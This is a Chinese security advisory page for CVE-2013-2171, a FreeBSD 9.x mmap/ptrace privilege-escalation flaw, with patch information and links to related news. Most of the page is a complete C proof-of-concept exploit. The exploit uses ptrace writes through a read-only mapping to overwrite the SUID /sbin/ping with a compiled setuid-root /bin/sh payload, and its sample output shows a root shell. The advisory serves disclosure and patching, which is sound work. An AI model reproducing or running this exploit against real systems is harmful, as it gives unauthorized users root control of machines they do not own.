发布日期:2013-06-18
更新日期:2013-07-04受影响系统:
FreeBSD FreeBSD >= 9.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60615
CVE(CAN) ID: CVE-2013-2171FreeBSD是一种UNIX操作系统,是由经过BSD、386BSD和4.4BSD发展而来的Unix的一个重要分支。FreeBSD 9.0及其他版本的虚拟内存系统对权限检查不充分,注入debugger之类的跟踪进程可在未授权情况下修改被跟踪进程的地址空间,覆盖内核内存,造成权限提升或系统崩溃。<*来源:Konstantin Belousov
链接:http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!/**
* FreeBSD privilege escalation CVE-2013-2171 (credits Konstantin Belousov & Alan Cox)
*
* tested on FreeBSD 9.1
* ref: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
*
* @_hugsy_
*
* Syntax :
$ id
uid=1001(user) gid=1001(user) groups=1001(user)
$ gcc -Wall ./mmap.c && ./a.out
[+] Saved old "/sbin/ping"
[+] Using mmap-ed area at 0x281a4000
[+] Attached to 3404
[+] Copied 4917 bytes of payload to "/sbin/ping"
[+] Triggering payload
# id
uid=0(root) gid=0(wheel) egid=1001(user) groups=1001(user),0(wheel)
*
* Note : TARGET (default /sbin/ping) will lose its SUID bit on restore, must be restored by hand
*
*/
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>#define LEN 1000*getpagesize()
#define TARGET "/sbin/ping" // will lose its SUID bit on restore, must be restored by handvoid kaboom(int pid, caddr_t addr)
{
int nb, i, a, fd, n;
char buf[60000] = {0,};
a = i = 0;
fd = open(TARGET, O_RDONLY);
nb = read(fd, buf, 60000);
close(fd);
printf("[+] Saved old "%s"
", TARGET);
printf("[+] Using mmap-ed area at %p
", addr);
if (ptrace(PT_ATTACH, pid, 0, 0) < 0) {
perror("[-] ptrace(PT_ATTACH) failed");
return;
}
printf("[+] Attached to %d
", pid);
wait(NULL);
fd = open("./sc.c", O_WRONLY|O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH);
write(fd, "#include <stdio.h>
main(){ char* s[]={"/bin/sh",NULL};setuid(0);execve(s[0],s,0); }
",84);
close(fd);
if (system("gcc -o ./sc ./sc.c") != 0) {
perror("[-] gcc");
return;
}
fd = open("./sc", O_RDONLY);
while (1) {
int a;
int n = read(fd, &a, sizeof(int));
if (n <= 0)
break;
if (ptrace(PT_WRITE_D, pid, addr+i, a) < 0) {
perror("[-] ptrace(PT_WRITE_D) failed");
return;
}
i+=n;
}
close(fd);
printf("[+] Copied %d bytes of payload to "%s"
", i, TARGET);
printf("[+] Triggering payload
");
system(TARGET);
printf("[+] Restoring "%s"
", TARGET);
for (n=0, i=0; n<nb; n++) {
if (ptrace(PT_WRITE_D, pid, addr+n, *(buf+n)) < 0) {
perror("[-] ptrace(PT_WRITE_D) failed");
return;
}
}
ptrace(PT_DETACH, pid, 0, 0);
printf("[+] Done
");
return;
}void dummy(int fd, caddr_t addr)
{
sleep(1);
munmap(addr, LEN);
close(fd);
return;
}int main(int argc, char** argv, char** envp)
{
int fd = open(TARGET, O_RDONLY);
caddr_t addr = mmap(NULL, LEN, PROT_READ, MAP_SHARED, fd, 0);
pid_t forked_pid = fork();
switch(forked_pid) {
case -1:
return -1;
case 0:
dummy(fd, addr);
break;
default:
munmap(addr, LEN);
close(fd);
kaboom(forked_pid, addr);
wait(NULL);
break;
} return 0;
}建议:
--------------------------------------------------------------------------------
厂商补丁:FreeBSD
-------
FreeBSD已经为此发布了一个安全公告(FreeBSD-SA-13:06.mmap.asc)以及相应补丁:
FreeBSD-SA-13:06.mmap.asc:Privilege escalation via mmap
链接:http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.ascIBM WebSphere MQ mqm缓冲区溢出漏洞HP多个产品信息泄露和代码执行漏洞相关资讯 FreeBSD
- FreeBSD 11发布 (今 14:22)
- FreeBSD 10.3-BETA2 发布下载 (02月16日)
- FreeBSD 10.3-BETA1 发布下载 (02月07日)
| - FreeBSD 10.3-BETA3 发布下载 (02月29日)
- FreeBSD下zfs: failed with error (02月14日)
- 如何在树莓派 2B 上安装 FreeBSD (12/24/2015 17:25:16)
|
本文评论 查看全部评论 (0)
易网时代-编程资源站